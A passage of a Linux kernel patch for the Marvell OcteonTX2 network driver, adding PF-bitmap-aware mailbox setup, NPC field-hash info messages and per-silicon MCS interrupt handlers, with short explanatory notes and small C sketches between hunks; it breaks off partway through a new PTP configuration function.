++		dev_err(&cgx->pdev->dev, "Unknown lmac_type_id %d reported by firmware on cgx port%d:%d",
++			linfo->lmac_type_id, cgx->cgx_id, lmac_id);
++		strncpy(linfo->lmac_type, "Unknown", LMACTYPE_STR_LEN - 1);
++		return;
++	}
++
+ 	lmac_string = cgx_lmactype_string[linfo->lmac_type_id];
+ 	strncpy(linfo->lmac_type, lmac_string, LMACTYPE_STR_LEN - 1);
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.c b/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
+index 2898931d5260a..9690ac01f02c8 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.c
+@@ -157,7 +157,7 @@ EXPORT_SYMBOL(otx2_mbox_init);
+  */
+ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void **hwbase,
+ 			   struct pci_dev *pdev, void *reg_base,
+-			   int direction, int ndevs)
++			   int direction, int ndevs, unsigned long *pf_bmap)
+ {
+ 	struct otx2_mbox_dev *mdev;
+ 	int devid, err;
+@@ -169,6 +169,9 @@ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void **hwbase,
+ 	mbox->hwbase = hwbase[0];
+ 
+ 	for (devid = 0; devid < ndevs; devid++) {
++		if (!test_bit(devid, pf_bmap))
++			continue;
++
+ 		mdev = &mbox->dev[devid];
+ 		mdev->mbase = hwbase[devid];
+ 		mdev->hwbase = hwbase[devid];
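
The mbox hunk above threads a PF bitmap into region setup so mailbox memory is initialized only for PFs that are actually enabled. A tiny model of the skip loop; test_bit() here is a userspace stand-in for the kernel helper.

#include <stdio.h>

static int test_bit(int n, const unsigned long *map)
{
	return (map[0] >> n) & 1UL;
}

int main(void)
{
	unsigned long pf_bmap = 0xBUL;	/* PFs 0, 1 and 3 enabled */
	int ndevs = 4;

	for (int devid = 0; devid < ndevs; devid++) {
		if (!test_bit(devid, &pf_bmap))
			continue;	/* no mbox region for a disabled PF */
		printf("init mbox region for PF %d\n", devid);
	}
	return 0;
}
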
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+index d2584ebb7a70c..d9ee56ff73b46 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+@@ -96,9 +96,10 @@ void otx2_mbox_destroy(struct otx2_mbox *mbox);
+ int otx2_mbox_init(struct otx2_mbox *mbox, void __force *hwbase,
+ 		   struct pci_dev *pdev, void __force *reg_base,
+ 		   int direction, int ndevs);
++
+ int otx2_mbox_regions_init(struct otx2_mbox *mbox, void __force **hwbase,
+ 			   struct pci_dev *pdev, void __force *reg_base,
+-			   int direction, int ndevs);
++			   int direction, int ndevs, unsigned long *bmap);
+ void otx2_mbox_msg_send(struct otx2_mbox *mbox, int devid);
+ int otx2_mbox_wait_for_rsp(struct otx2_mbox *mbox, int devid);
+ int otx2_mbox_busy_poll_for_rsp(struct otx2_mbox *mbox, int devid);
+@@ -242,9 +243,9 @@ M(NPC_MCAM_READ_BASE_RULE, 0x6011, npc_read_base_steer_rule,            \
+ M(NPC_MCAM_GET_STATS, 0x6012, npc_mcam_entry_stats,                     \
+ 				   npc_mcam_get_stats_req,              \
+ 				   npc_mcam_get_stats_rsp)              \
+-M(NPC_GET_SECRET_KEY, 0x6013, npc_get_secret_key,                     \
+-				   npc_get_secret_key_req,              \
+-				   npc_get_secret_key_rsp)              \
++M(NPC_GET_FIELD_HASH_INFO, 0x6013, npc_get_field_hash_info,                     \
++				   npc_get_field_hash_info_req,              \
++				   npc_get_field_hash_info_rsp)              \
+ M(NPC_GET_FIELD_STATUS, 0x6014, npc_get_field_status,                     \
+ 				   npc_get_field_status_req,              \
+ 				   npc_get_field_status_rsp)              \
+@@ -1517,14 +1518,20 @@ struct npc_mcam_get_stats_rsp {
+ 	u8 stat_ena; /* enabled */
+ };
+ 
+-struct npc_get_secret_key_req {
++struct npc_get_field_hash_info_req {
+ 	struct mbox_msghdr hdr;
+ 	u8 intf;
+ };
+ 
+-struct npc_get_secret_key_rsp {
++struct npc_get_field_hash_info_rsp {
+ 	struct mbox_msghdr hdr;
+ 	u64 secret_key[3];
++#define NPC_MAX_HASH 2
++#define NPC_MAX_HASH_MASK 2
++	/* NPC_AF_INTF(0..1)_HASH(0..1)_MASK(0..1) */
++	u64 hash_mask[NPC_MAX_INTF][NPC_MAX_HASH][NPC_MAX_HASH_MASK];
++	/* NPC_AF_INTF(0..1)_HASH(0..1)_RESULT_CTRL */
++	u64 hash_ctrl[NPC_MAX_INTF][NPC_MAX_HASH];
+ };
+ 
+ enum ptp_op {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+index f68a6a0e3aa41..c43f19dfbd744 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.c
+@@ -473,6 +473,8 @@ void mcs_flowid_entry_write(struct mcs *mcs, u64 *data, u64 *mask, int flow_id,
+ 		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_RX_SLAVE_FLOWID_TCAM_DATAX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, data[reg_id]);
++		}
++		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_RX_SLAVE_FLOWID_TCAM_MASKX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, mask[reg_id]);
+ 		}
+@@ -480,6 +482,8 @@ void mcs_flowid_entry_write(struct mcs *mcs, u64 *data, u64 *mask, int flow_id,
+ 		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_TX_SLAVE_FLOWID_TCAM_DATAX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, data[reg_id]);
++		}
++		for (reg_id = 0; reg_id < 4; reg_id++) {
+ 			reg = MCSX_CPM_TX_SLAVE_FLOWID_TCAM_MASKX(reg_id, flow_id);
+ 			mcs_reg_write(mcs, reg, mask[reg_id]);
+ 		}
+@@ -494,6 +498,9 @@ int mcs_install_flowid_bypass_entry(struct mcs *mcs)
+ 
+ 	/* Flow entry */
+ 	flow_id = mcs->hw->tcam_entries - MCS_RSRC_RSVD_CNT;
++	__set_bit(flow_id, mcs->rx.flow_ids.bmap);
++	__set_bit(flow_id, mcs->tx.flow_ids.bmap);
++
+ 	for (reg_id = 0; reg_id < 4; reg_id++) {
+ 		reg = MCSX_CPM_RX_SLAVE_FLOWID_TCAM_MASKX(reg_id, flow_id);
+ 		mcs_reg_write(mcs, reg, GENMASK_ULL(63, 0));
+@@ -504,6 +511,8 @@ int mcs_install_flowid_bypass_entry(struct mcs *mcs)
+ 	}
+ 	/* secy */
+ 	secy_id = mcs->hw->secy_entries - MCS_RSRC_RSVD_CNT;
++	__set_bit(secy_id, mcs->rx.secy.bmap);
++	__set_bit(secy_id, mcs->tx.secy.bmap);
+ 
+ 	/* Set validate frames to NULL and enable control port */
+ 	plcy = 0x7ull;
+@@ -528,6 +537,7 @@ int mcs_install_flowid_bypass_entry(struct mcs *mcs)
+ 	/* Enable Flowid entry */
+ 	mcs_ena_dis_flowid_entry(mcs, flow_id, MCS_RX, true);
+ 	mcs_ena_dis_flowid_entry(mcs, flow_id, MCS_TX, true);
++
+ 	return 0;
+ }
+ 
+@@ -926,60 +936,42 @@ static void mcs_tx_misc_intr_handler(struct mcs *mcs, u64 intr)
+ 	mcs_add_intr_wq_entry(mcs, &event);
+ }
+ 
+-static void mcs_bbe_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir)
++void cn10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr,
++				 enum mcs_direction dir)
+ {
+-	struct mcs_intr_event event = { 0 };
+-	int i;
++	u64 val, reg;
++	int lmac;
+ 
+-	if (!(intr & MCS_BBE_INT_MASK))
++	if (!(intr & 0x6ULL))
+ 		return;
+ 
+-	event.mcs_id = mcs->mcs_id;
+-	event.pcifunc = mcs->pf_map[0];
++	if (intr & BIT_ULL(1))
++		reg = (dir == MCS_RX) ? MCSX_BBE_RX_SLAVE_DFIFO_OVERFLOW_0 :
++					MCSX_BBE_TX_SLAVE_DFIFO_OVERFLOW_0;
++	else
++		reg = (dir == MCS_RX) ? MCSX_BBE_RX_SLAVE_PLFIFO_OVERFLOW_0 :
++					MCSX_BBE_TX_SLAVE_PLFIFO_OVERFLOW_0;
++	val = mcs_reg_read(mcs, reg);
+ 
+-	for (i = 0; i < MCS_MAX_BBE_INT; i++) {
+-		if (!(intr & BIT_ULL(i)))
++	/* policy/data overflow occurred */
++	for (lmac = 0; lmac < mcs->hw->lmac_cnt; lmac++) {
++		if (!(val & BIT_ULL(lmac)))
+ 			continue;
+-
+-		/* Lower nibble denotes data fifo overflow interrupts and
+-		 * upper nibble indicates policy fifo overflow interrupts.
+-		 */
+-		if (intr & 0xFULL)
+-			event.intr_mask = (dir == MCS_RX) ?
+-					  MCS_BBE_RX_DFIFO_OVERFLOW_INT :
+-					  MCS_BBE_TX_DFIFO_OVERFLOW_INT;
+-		else
+-			event.intr_mask = (dir == MCS_RX) ?
+-					  MCS_BBE_RX_PLFIFO_OVERFLOW_INT :
+-					  MCS_BBE_TX_PLFIFO_OVERFLOW_INT;
+-
+-		/* Notify the lmac_id info which ran into BBE fatal error */
+-		event.lmac_id = i & 0x3ULL;
+-		mcs_add_intr_wq_entry(mcs, &event);
++		dev_warn(mcs->dev, "BBE: policy or data overflow occurred on lmac:%d\n", lmac);
+ 	}
+ }
+ 
+-static void mcs_pab_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir)
++void cn10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr,
++				 enum mcs_direction dir)
+ {
+-	struct mcs_intr_event event = { 0 };
+-	int i;
++	int lmac;
+ 
+-	if (!(intr & MCS_PAB_INT_MASK))
++	if (!(intr & 0xFFFFFULL))
+ 		return;
+ 
+-	event.mcs_id = mcs->mcs_id;
+-	event.pcifunc = mcs->pf_map[0];
+-
+-	for (i = 0; i < MCS_MAX_PAB_INT; i++) {
+-		if (!(intr & BIT_ULL(i)))
+-			continue;
+-
+-		event.intr_mask = (dir == MCS_RX) ? MCS_PAB_RX_CHAN_OVERFLOW_INT :
+-				  MCS_PAB_TX_CHAN_OVERFLOW_INT;
+-
+-		/* Notify the lmac_id info which ran into PAB fatal error */
+-		event.lmac_id = i;
+-		mcs_add_intr_wq_entry(mcs, &event);
++	for (lmac = 0; lmac < mcs->hw->lmac_cnt; lmac++) {
++		if (intr & BIT_ULL(lmac))
++			dev_warn(mcs->dev, "PAB: overflow occurred on lmac:%d\n", lmac);
+ 	}
+ }
+ 
+@@ -988,9 +980,8 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	struct mcs *mcs = (struct mcs *)mcs_irq;
+ 	u64 intr, cpm_intr, bbe_intr, pab_intr;
+ 
+-	/* Disable and clear the interrupt */
++	/* Disable the interrupt */
+ 	mcs_reg_write(mcs, MCSX_IP_INT_ENA_W1C, BIT_ULL(0));
+-	mcs_reg_write(mcs, MCSX_IP_INT, BIT_ULL(0));
+ 
+ 	/* Check which block has interrupt */
+ 	intr = mcs_reg_read(mcs, MCSX_TOP_SLAVE_INT_SUM);
+@@ -1037,7 +1028,7 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* BBE RX */
+ 	if (intr & MCS_BBE_RX_INT_ENA) {
+ 		bbe_intr = mcs_reg_read(mcs, MCSX_BBE_RX_SLAVE_BBE_INT);
+-		mcs_bbe_intr_handler(mcs, bbe_intr, MCS_RX);
++		mcs->mcs_ops->mcs_bbe_intr_handler(mcs, bbe_intr, MCS_RX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_BBE_RX_SLAVE_BBE_INT_INTR_RW, 0);
+@@ -1047,7 +1038,7 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* BBE TX */
+ 	if (intr & MCS_BBE_TX_INT_ENA) {
+ 		bbe_intr = mcs_reg_read(mcs, MCSX_BBE_TX_SLAVE_BBE_INT);
+-		mcs_bbe_intr_handler(mcs, bbe_intr, MCS_TX);
++		mcs->mcs_ops->mcs_bbe_intr_handler(mcs, bbe_intr, MCS_TX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_BBE_TX_SLAVE_BBE_INT_INTR_RW, 0);
+@@ -1057,7 +1048,7 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* PAB RX */
+ 	if (intr & MCS_PAB_RX_INT_ENA) {
+ 		pab_intr = mcs_reg_read(mcs, MCSX_PAB_RX_SLAVE_PAB_INT);
+-		mcs_pab_intr_handler(mcs, pab_intr, MCS_RX);
++		mcs->mcs_ops->mcs_pab_intr_handler(mcs, pab_intr, MCS_RX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_PAB_RX_SLAVE_PAB_INT_INTR_RW, 0);
+@@ -1067,14 +1058,15 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* PAB TX */
+ 	if (intr & MCS_PAB_TX_INT_ENA) {
+ 		pab_intr = mcs_reg_read(mcs, MCSX_PAB_TX_SLAVE_PAB_INT);
+-		mcs_pab_intr_handler(mcs, pab_intr, MCS_TX);
++		mcs->mcs_ops->mcs_pab_intr_handler(mcs, pab_intr, MCS_TX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT_INTR_RW, 0);
+ 		mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT, pab_intr);
+ 	}
+ 
+-	/* Enable the interrupt */
++	/* Clear and enable the interrupt */
++	mcs_reg_write(mcs, MCSX_IP_INT, BIT_ULL(0));
+ 	mcs_reg_write(mcs, MCSX_IP_INT_ENA_W1S, BIT_ULL(0));
+ 
+ 	return IRQ_HANDLED;
+@@ -1156,7 +1148,7 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 		return ret;
+ 	}
+ 
+-	ret = request_irq(pci_irq_vector(mcs->pdev, MCS_INT_VEC_IP),
++	ret = request_irq(pci_irq_vector(mcs->pdev, mcs->hw->ip_vec),
+ 			  mcs_ip_intr_handler, 0, "MCS_IP", mcs);
+ 	if (ret) {
+ 		dev_err(mcs->dev, "MCS IP irq registration failed\n");
+@@ -1175,11 +1167,11 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 	mcs_reg_write(mcs, MCSX_CPM_TX_SLAVE_TX_INT_ENB, 0x7ULL);
+ 	mcs_reg_write(mcs, MCSX_CPM_RX_SLAVE_RX_INT_ENB, 0x7FULL);
+ 
+-	mcs_reg_write(mcs, MCSX_BBE_RX_SLAVE_BBE_INT_ENB, 0xff);
+-	mcs_reg_write(mcs, MCSX_BBE_TX_SLAVE_BBE_INT_ENB, 0xff);
++	mcs_reg_write(mcs, MCSX_BBE_RX_SLAVE_BBE_INT_ENB, 0xFFULL);
++	mcs_reg_write(mcs, MCSX_BBE_TX_SLAVE_BBE_INT_ENB, 0xFFULL);
+ 
+-	mcs_reg_write(mcs, MCSX_PAB_RX_SLAVE_PAB_INT_ENB, 0xff);
+-	mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT_ENB, 0xff);
++	mcs_reg_write(mcs, MCSX_PAB_RX_SLAVE_PAB_INT_ENB, 0xFFFFFULL);
++	mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT_ENB, 0xFFFFFULL);
+ 
+ 	mcs->tx_sa_active = alloc_mem(mcs, mcs->hw->sc_entries);
+ 	if (!mcs->tx_sa_active) {
+@@ -1190,7 +1182,7 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 	return ret;
+ 
+ free_irq:
+-	free_irq(pci_irq_vector(mcs->pdev, MCS_INT_VEC_IP), mcs);
++	free_irq(pci_irq_vector(mcs->pdev, mcs->hw->ip_vec), mcs);
+ exit:
+ 	pci_free_irq_vectors(mcs->pdev);
+ 	mcs->num_vec = 0;
+@@ -1325,8 +1317,11 @@ void mcs_reset_port(struct mcs *mcs, u8 port_id, u8 reset)
+ void mcs_set_lmac_mode(struct mcs *mcs, int lmac_id, u8 mode)
+ {
+ 	u64 reg;
++	int id = lmac_id * 2;
+ 
+-	reg = MCSX_MCS_TOP_SLAVE_CHANNEL_CFG(lmac_id * 2);
++	reg = MCSX_MCS_TOP_SLAVE_CHANNEL_CFG(id);
++	mcs_reg_write(mcs, reg, (u64)mode);
++	reg = MCSX_MCS_TOP_SLAVE_CHANNEL_CFG((id + 1));
+ 	mcs_reg_write(mcs, reg, (u64)mode);
+ }
+ 
+@@ -1484,6 +1479,7 @@ void cn10kb_mcs_set_hw_capabilities(struct mcs *mcs)
+ 	hw->lmac_cnt = 20;		/* lmacs/ports per mcs block */
+ 	hw->mcs_x2p_intf = 5;		/* x2p calibration intf */
+ 	hw->mcs_blks = 1;		/* MCS blocks */
++	hw->ip_vec = MCS_CN10KB_INT_VEC_IP; /* IP vector */
+ }
+ 
+ static struct mcs_ops cn10kb_mcs_ops = {
+@@ -1492,6 +1488,8 @@ static struct mcs_ops cn10kb_mcs_ops = {
+ 	.mcs_tx_sa_mem_map_write	= cn10kb_mcs_tx_sa_mem_map_write,
+ 	.mcs_rx_sa_mem_map_write	= cn10kb_mcs_rx_sa_mem_map_write,
+ 	.mcs_flowid_secy_map		= cn10kb_mcs_flowid_secy_map,
++	.mcs_bbe_intr_handler		= cn10kb_mcs_bbe_intr_handler,
++	.mcs_pab_intr_handler		= cn10kb_mcs_pab_intr_handler,
+ };
+ 
+ static int mcs_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+@@ -1592,7 +1590,7 @@ static void mcs_remove(struct pci_dev *pdev)
+ 
+ 	/* Set MCS to external bypass */
+ 	mcs_set_external_bypass(mcs, true);
+-	free_irq(pci_irq_vector(pdev, MCS_INT_VEC_IP), mcs);
++	free_irq(pci_irq_vector(pdev, mcs->hw->ip_vec), mcs);
+ 	pci_free_irq_vectors(pdev);
+ 	pci_release_regions(pdev);
+ 	pci_disable_device(pdev);
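
The mcs.c changes above move the BBE and PAB interrupt handlers behind the per-silicon mcs_ops table, so CN10K-B and CNF10K-B each install their own handler and the shared ISR simply calls through the ops pointer. A minimal sketch of that dispatch; the struct fields and names are abbreviated for illustration.

#include <stdio.h>

struct mcs;

struct mcs_ops {
	void (*bbe_intr_handler)(struct mcs *mcs, unsigned long intr);
};

struct mcs {
	const struct mcs_ops *ops;
};

static void cn10kb_bbe(struct mcs *m, unsigned long intr)
{
	printf("cn10kb handler: intr %#lx\n", intr);
}

static void isr(struct mcs *m, unsigned long intr)
{
	m->ops->bbe_intr_handler(m, intr);	/* silicon-specific path */
}

int main(void)
{
	static const struct mcs_ops cn10kb_ops = {
		.bbe_intr_handler = cn10kb_bbe,
	};
	struct mcs m = { .ops = &cn10kb_ops };

	isr(&m, 0x6);
	return 0;
}
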
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.h b/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
+index 64dc2b80e15dd..0f89dcb764654 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
+@@ -43,24 +43,15 @@
+ /* Reserved resources for default bypass entry */
+ #define MCS_RSRC_RSVD_CNT		1
+ 
+-/* MCS Interrupt Vector Enumeration */
+-enum mcs_int_vec_e {
+-	MCS_INT_VEC_MIL_RX_GBL		= 0x0,
+-	MCS_INT_VEC_MIL_RX_LMACX	= 0x1,
+-	MCS_INT_VEC_MIL_TX_LMACX	= 0x5,
+-	MCS_INT_VEC_HIL_RX_GBL		= 0x9,
+-	MCS_INT_VEC_HIL_RX_LMACX	= 0xa,
+-	MCS_INT_VEC_HIL_TX_GBL		= 0xe,
+-	MCS_INT_VEC_HIL_TX_LMACX	= 0xf,
+-	MCS_INT_VEC_IP			= 0x13,
+-	MCS_INT_VEC_CNT			= 0x14,
+-};
++/* MCS Interrupt Vector */
++#define MCS_CNF10KB_INT_VEC_IP	0x13
++#define MCS_CN10KB_INT_VEC_IP	0x53
+ 
+ #define MCS_MAX_BBE_INT			8ULL
+ #define MCS_BBE_INT_MASK		0xFFULL
+ 
+-#define MCS_MAX_PAB_INT			4ULL
+-#define MCS_PAB_INT_MASK		0xFULL
++#define MCS_MAX_PAB_INT		8ULL
++#define MCS_PAB_INT_MASK	0xFULL
+ 
+ #define MCS_BBE_RX_INT_ENA		BIT_ULL(0)
+ #define MCS_BBE_TX_INT_ENA		BIT_ULL(1)
+@@ -137,6 +128,7 @@ struct hwinfo {
+ 	u8 lmac_cnt;
+ 	u8 mcs_blks;
+ 	unsigned long	lmac_bmap; /* bitmap of enabled mcs lmac */
++	u16 ip_vec;
+ };
+ 
+ struct mcs {
+@@ -165,6 +157,8 @@ struct mcs_ops {
+ 	void	(*mcs_tx_sa_mem_map_write)(struct mcs *mcs, struct mcs_tx_sc_sa_map *map);
+ 	void	(*mcs_rx_sa_mem_map_write)(struct mcs *mcs, struct mcs_rx_sc_sa_map *map);
+ 	void	(*mcs_flowid_secy_map)(struct mcs *mcs, struct secy_mem_map *map, int dir);
++	void	(*mcs_bbe_intr_handler)(struct mcs *mcs, u64 intr, enum mcs_direction dir);
++	void	(*mcs_pab_intr_handler)(struct mcs *mcs, u64 intr, enum mcs_direction dir);
+ };
+ 
+ extern struct pci_driver mcs_driver;
+@@ -219,6 +213,8 @@ void cn10kb_mcs_tx_sa_mem_map_write(struct mcs *mcs, struct mcs_tx_sc_sa_map *ma
+ void cn10kb_mcs_flowid_secy_map(struct mcs *mcs, struct secy_mem_map *map, int dir);
+ void cn10kb_mcs_rx_sa_mem_map_write(struct mcs *mcs, struct mcs_rx_sc_sa_map *map);
+ void cn10kb_mcs_parser_cfg(struct mcs *mcs);
++void cn10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
++void cn10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
+ 
+ /* CNF10K-B APIs */
+ struct mcs_ops *cnf10kb_get_mac_ops(void);
+@@ -229,6 +225,8 @@ void cnf10kb_mcs_rx_sa_mem_map_write(struct mcs *mcs, struct mcs_rx_sc_sa_map *m
+ void cnf10kb_mcs_parser_cfg(struct mcs *mcs);
+ void cnf10kb_mcs_tx_pn_thresh_reached_handler(struct mcs *mcs);
+ void cnf10kb_mcs_tx_pn_wrapped_handler(struct mcs *mcs);
++void cnf10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
++void cnf10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
+ 
+ /* Stats APIs */
+ void mcs_get_sc_stats(struct mcs *mcs, struct mcs_sc_stats *stats, int id, int dir);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c
+index 7b62054144286..9f9b904ab2cd0 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c
+@@ -13,6 +13,8 @@ static struct mcs_ops cnf10kb_mcs_ops   = {
+ 	.mcs_tx_sa_mem_map_write	= cnf10kb_mcs_tx_sa_mem_map_write,
+ 	.mcs_rx_sa_mem_map_write	= cnf10kb_mcs_rx_sa_mem_map_write,
+ 	.mcs_flowid_secy_map		= cnf10kb_mcs_flowid_secy_map,
++	.mcs_bbe_intr_handler		= cnf10kb_mcs_bbe_intr_handler,
++	.mcs_pab_intr_handler		= cnf10kb_mcs_pab_intr_handler,
+ };
+ 
+ struct mcs_ops *cnf10kb_get_mac_ops(void)
+@@ -31,6 +33,7 @@ void cnf10kb_mcs_set_hw_capabilities(struct mcs *mcs)
+ 	hw->lmac_cnt = 4;		/* lmacs/ports per mcs block */
+ 	hw->mcs_x2p_intf = 1;		/* x2p calibration intf */
+ 	hw->mcs_blks = 7;		/* MCS blocks */
++	hw->ip_vec = MCS_CNF10KB_INT_VEC_IP; /* IP vector */
+ }
+ 
+ void cnf10kb_mcs_parser_cfg(struct mcs *mcs)
+@@ -212,3 +215,63 @@ void cnf10kb_mcs_tx_pn_wrapped_handler(struct mcs *mcs)
+ 		mcs_add_intr_wq_entry(mcs, &event);
+ 	}
+ }
++
++void cnf10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr,
++				  enum mcs_direction dir)
++{
++	struct mcs_intr_event event = { 0 };
++	int i;
++
++	if (!(intr & MCS_BBE_INT_MASK))
++		return;
++
++	event.mcs_id = mcs->mcs_id;
++	event.pcifunc = mcs->pf_map[0];
++
++	for (i = 0; i < MCS_MAX_BBE_INT; i++) {
++		if (!(intr & BIT_ULL(i)))
++			continue;
++
++		/* Lower nibble denotes data fifo overflow interrupts and
++		 * upper nibble indicates policy fifo overflow interrupts.
++		 */
++		if (intr & 0xFULL)
++			event.intr_mask = (dir == MCS_RX) ?
++					  MCS_BBE_RX_DFIFO_OVERFLOW_INT :
++					  MCS_BBE_TX_DFIFO_OVERFLOW_INT;
++		else
++			event.intr_mask = (dir == MCS_RX) ?
++					  MCS_BBE_RX_PLFIFO_OVERFLOW_INT :
++					  MCS_BBE_TX_PLFIFO_OVERFLOW_INT;
++
++		/* Notify the lmac_id info which ran into BBE fatal error */
++		event.lmac_id = i & 0x3ULL;
++		mcs_add_intr_wq_entry(mcs, &event);
++	}
++}
++
++void cnf10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr,
++				  enum mcs_direction dir)
++{
++	struct mcs_intr_event event = { 0 };
++	int i;
++
++	if (!(intr & MCS_PAB_INT_MASK))
++		return;
++
++	event.mcs_id = mcs->mcs_id;
++	event.pcifunc = mcs->pf_map[0];
++
++	for (i = 0; i < MCS_MAX_PAB_INT; i++) {
++		if (!(intr & BIT_ULL(i)))
++			continue;
++
++		event.intr_mask = (dir == MCS_RX) ?
++				  MCS_PAB_RX_CHAN_OVERFLOW_INT :
++				  MCS_PAB_TX_CHAN_OVERFLOW_INT;
++
++		/* Notify the lmac_id info which ran into PAB fatal error */
++		event.lmac_id = i;
++		mcs_add_intr_wq_entry(mcs, &event);
++	}
++}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h b/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
+index c95a8b8f5eaf7..f3ab01fc363c8 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
+@@ -97,6 +97,7 @@
+ #define MCSX_PEX_TX_SLAVE_VLAN_CFGX(a)          (0x46f8ull + (a) * 0x8ull)
+ #define MCSX_PEX_TX_SLAVE_CUSTOM_TAG_REL_MODE_SEL(a)	(0x788ull + (a) * 0x8ull)
+ #define MCSX_PEX_TX_SLAVE_PORT_CONFIG(a)		(0x4738ull + (a) * 0x8ull)
++#define MCSX_PEX_RX_SLAVE_PORT_CFGX(a)		(0x3b98ull + (a) * 0x8ull)
+ #define MCSX_PEX_RX_SLAVE_RULE_ETYPE_CFGX(a) ({	\
+ 	u64 offset;					\
+ 							\
+@@ -275,7 +276,10 @@
+ #define MCSX_BBE_RX_SLAVE_CAL_ENTRY			0x180ull
+ #define MCSX_BBE_RX_SLAVE_CAL_LEN			0x188ull
+ #define MCSX_PAB_RX_SLAVE_FIFO_SKID_CFGX(a)		(0x290ull + (a) * 0x40ull)
+-
++#define MCSX_BBE_RX_SLAVE_DFIFO_OVERFLOW_0		0xe20
++#define MCSX_BBE_TX_SLAVE_DFIFO_OVERFLOW_0		0x1298
++#define MCSX_BBE_RX_SLAVE_PLFIFO_OVERFLOW_0		0xe40
++#define MCSX_BBE_TX_SLAVE_PLFIFO_OVERFLOW_0		0x12b8
+ #define MCSX_BBE_RX_SLAVE_BBE_INT ({	\
+ 	u64 offset;			\
+ 					\
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+index eb25e458266ca..dfd23580e3b8e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+@@ -11,6 +11,7 @@
+ 
+ #include "mcs.h"
+ #include "rvu.h"
++#include "mcs_reg.h"
+ #include "lmac_common.h"
+ 
+ #define M(_name, _id, _fn_name, _req_type, _rsp_type)			\
+@@ -32,6 +33,42 @@ static struct _req_type __maybe_unused					\
+ MBOX_UP_MCS_MESSAGES
+ #undef M
+ 
++void rvu_mcs_ptp_cfg(struct rvu *rvu, u8 rpm_id, u8 lmac_id, bool ena)
++{
++	struct mcs *mcs;
++	u64 cfg;
++	u8 port;
++
++	if (!rvu->mcs_blk_cnt)
++		return;
++
++	/* When PTP is enabled, RPM prepends an 8B header to all
++	 * RX packets, so the MCS PEX block must be configured to
++	 * skip those 8 bytes during packet parsing.
++	 */
++
++	/* CNF10K-B */
++	if (rvu->mcs_blk_cnt > 1) {
++		mcs = mcs_get_pdata(rpm_id);
++		cfg = mcs_reg_read(mcs, MCSX_PEX_RX_SLAVE_PEX_CONFIGURATION);
++		if (ena)
++			cfg |= BIT_ULL(lmac_id);
++		else
